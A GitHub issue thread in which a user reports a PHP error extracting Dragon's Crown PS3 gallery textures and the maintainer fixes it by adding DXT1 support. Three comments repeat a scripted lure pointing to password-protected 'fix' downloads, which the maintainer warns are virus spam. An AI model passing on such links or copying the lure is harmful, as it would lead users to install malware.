### ISSUE TITLE
Dragons Crown extract issues

### ISSUE THREAD

**Issue by Gawidev** [rufaswan/Web2D_Games#20]
Hello, I've been playing around ripping dragons crown files (ps3 and ps4) quite a bit. I've run into a rather unique problem when trying to extract the treasure_art (unlockable gallery images) .ftx files from the ps3 version. Within the CPK, most of those files are 4mb in size while some are 8mb.
Attempting to export the 8mb ones works successfully, however doing the same for any of the 4mb ones results in a consistent fatal error report:
```
PHP Fatal error:  PHP : UNKNOWN im fmt  86
    in psxtools\common.inc on line 85
```
I can't tell what the issue could be, the filesize difference being consistent would seem to be an indicator of something, but the game itself runs without issues.
Any ideas as to what could be the cause?

Also I don't know if this is the right medium for discussion but I've only recently started playing Dragons Crown with friends, have been loving the artstyle and was really mindblown and inspired when I stumbled across this project :) given I've played with the files quite a bit, I have a few other things I could report here if it could be helpful, and maybe turn into their own issues if needed.
Regardless, good job with everything so far, it really is impressive.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rufaswan** [comment]
Hi! Thanks for reporting this error. I must have missed checking those FTX files. 0x86 is DXT1 encoding, and the script is updated to support those files. 

Also, I got notified someone is posting spam link to download some virus. DO NOT click those links. All updates will be committed to this repo, and since it is in PHP, they are also in text files. You can examine the source before running them.

Thanks for your interest in this project! Let me know if you find any more problems. Have fun!

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
